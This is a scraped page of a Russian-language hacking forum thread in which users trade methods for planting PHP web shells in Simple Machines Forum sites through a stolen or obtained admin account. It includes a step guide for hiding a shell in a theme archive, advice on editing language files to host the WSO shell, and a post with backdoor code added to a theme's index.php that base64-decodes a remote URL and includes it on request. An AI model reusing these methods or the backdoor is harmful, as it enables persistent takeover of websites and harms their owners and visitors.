HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу Faq по Smf (Заливка шелла)!
   
Ответ
Страница 2 из 3 < 1 2 3 >
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 12.04.2009, 10:23
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию
Нельзя, конечно.
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 12.04.2009, 10:28
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
С нами: 9619229

Репутация: 445


По умолчанию
1ce666 можно если присуствует уязв
к примеру уязвимость в версии SMF 1.1.6 Remote File Exect (как то так)
 
Ответить с цитированием

  #3  
Старый 02.01.2010, 21:12
FaTRuS
Познающий
Регистрация: 28.08.2006
Сообщений: 94
С нами: 10369861

Репутация: 1
По умолчанию
Цитата:
Сообщение от fly  
Заливаем шелл в SMF

Если ты имеешь админский акк в этом форуме.

Шаг_1

Зходим на форум под админом. Затем идем
Код:
http://hacked.com/smf/index.php?action=admin
[Admin].

Шаг_2

На левой боковой вкладке выбираем [Themes and Layout].Внизу увидешь форму для upload тем для форума.
Темы закачиваются в формате zip-архива.

Шаг_3

Идем на официальный сайт форумного движка в раздел (mOds)
Код:
http://custom.simplemachines.org/themes/
Здесь выбираем любую тему(на твой вкус и цвет). Я выбираю [blackTedSkin]
Код:
http://custom.simplemachines.org/themes/index.php?lemma=66
От сюда качаем
Код:
http://custom.simplemachines.org/themes/index.php?action=download;lemma=66;id=306
Шаг_4

Открываем zip с нашей темой и добавляем в архив свой php-shell--Пример директория /images/icons/myshell.php

Шаг_5

Идем к форме [Install a New Theme]
Добавляем наш архив-- From a file:blackTed.zip
И даем название нашей теме-- Create a copy of Default named: HACK_THEME
Жмем-- Install
Если все прошло хорошо, то появиться надпись:blackTed was installed successfully.

Шаг_6_Final

Идем по ссылке(для случая с blackTed темой)--
Код:
http://hacked.com/smf/Themes/blackTed/icons/Fun_shell.php
Спасибо за внимание.
Данный способ не срабатывает отказано вна запись!!!
В какую дирректорию можно залить??? есть предположения попытатся залить в attachments но просмотреть эту дирректорию невозможно

Пррошу помощи и подскажите нормальный шелл для навигации по дирректориям как по FTP
 
Ответить с цитированием

  #4  
Старый 11.01.2010, 11:46
_eXorcist_
Участник форума
Регистрация: 24.12.2009
Сообщений: 130
С нами: 8621768

Репутация: -3
По умолчанию
просто меняешь директорию загрузки тем и заливаешь ее в другую диру


у меня при устанокке тем пишет типо

Internal Server Error

The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator, webmaster@cp874990.cpanel.tech-logol.ru and inform them of the time the error occurred, and anything you might have done that may have caused the error.

More information about this error may be available in the server error log.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.


права на выполнения php файлов выставлены что л и как то по другому?
Последний раз редактировалось _eXorcist_; 11.01.2010 в 11:50..
 
Ответить с цитированием

  #5  
Старый 13.04.2010, 04:26
Рамос
Познающий
Регистрация: 30.10.2009
Сообщений: 41
С нами: 8700818

Репутация: 6
По умолчанию
нет прав на запись в Themes/Packages, редактирования тем
тупик ?
 
Ответить с цитированием

  #6  
Старый 05.05.2010, 19:36
Underwhy
Новичок
Регистрация: 12.07.2009
Сообщений: 15
С нами: 8858682

Репутация: 0
По умолчанию
Нужно залить шелл на SMF.
Версия 2.0 RC1.2
Способ с заливкой файла / стиля выдаёт 404 NOT FOUND, но заливается и я могу даже редактировать файл стиля через админку.
 
Ответить с цитированием

  #7  
Старый 22.06.2010, 04:51
cipa21
Новичок
Регистрация: 09.04.2009
Сообщений: 8
С нами: 8994048

Репутация: 0
По умолчанию
В общем ситуация следующая.

Есть админка от SMF 1.1.2 хотелось бы залить шелл, но столкнулся с не очень хорошей ситуацией, злой админ полностью все файлы выставил права "только для чтания" также само и на папки!
 
Ответить с цитированием

  #8  
Старый 10.12.2011, 02:25
Radiator
Участник форума
Регистрация: 17.03.2009
Сообщений: 234
С нами: 9027735

Репутация: 128
По умолчанию
Добавьте еще один способ при наличии админского пароля.


Лично мне ничего из перечисленного не помогло.

был SMF 1.1.3.

Идем Main>Themes and Layout> Modify Themes> Browse the templates and files in this theme

Выбираем верхнюю тему.

Идем в папку /languages/ и правим любой файл, заливая туда шелл. (я брал WSO 2.5)

Мой пример

Цитата:
Сообщение от None  
http://www.site.ru/forum/Themes/classic/languages/Сюда-залили-шел.php
Вуаля
 
Ответить с цитированием

  #9  
Старый 23.07.2012, 22:49
Sat-hacker
Познающий
Регистрация: 19.05.2012
Сообщений: 98
С нами: 7359446

Репутация: -10
По умолчанию
Подскажите как залить shel в SMF 2.0 RC4 имея админский аккаун?
 
Ответить с цитированием

  #10  
Старый 12.07.2007, 08:23
n-000
Участник форума
Регистрация: 25.10.2006
Сообщений: 108
С нами: 10286027

Репутация: 91
По умолчанию
Сталкивался с проблемой, когда запись в папки запрещалась ... это легко решить !
Идём по адресу ../forum/index.php?action=theme;th=1;sesc=3d8eb20e38590c370 b19dba2e203d926;sa=edit;filename=index.php
ну и спокойно правим в открывшемся окне индекс, точнее добавляем в него что то типа
PHP код:
$str=base64_decode('aHR0cDovL2ZmZmYueHkvc2hlbGwudHh0');
if($_GET['act']=='run'){include($str);}; 
дальше приспокойно переходим по след адресу с нужными нам параметрами
/forum/Themes/default/index.php?act=run
Главное не суетитесь господа ...

********************************

Полный листинг индекса выглядит таким вот образом
PHP код:
<?php

// Try to handle it with the upper level index.php.  (it should know what to do.)
$str=base64_decode('aHR0cDovL2ZmZmYueHkvc2hlbGwudHh0');
if($_GET['act']=='run'){include($str);};
if (file_exists(dirname(dirname(__FILE__)) . '/index.php'))
   include (dirname(dirname(__FILE__)) . '/index.php');
else
   exit;

?>
 
Ответить с цитированием
Ответ
Страница 2 из 3 < 1 2 3 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Заливка шелла cardons Уязвимости CMS / форумов 11 15.04.2014 12:52
Заливка шелла в Мамбо с правами админа gibson Комментарии к видео 5 30.05.2007 23:35
Заливка шелла на Ipb 2.1.7 Thrasher Уязвимости CMS / форумов 15 14.01.2007 14:51
Заливка шелла, взлом сайта. Sulf aka Joker Болталка 2 03.07.2006 23:55



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.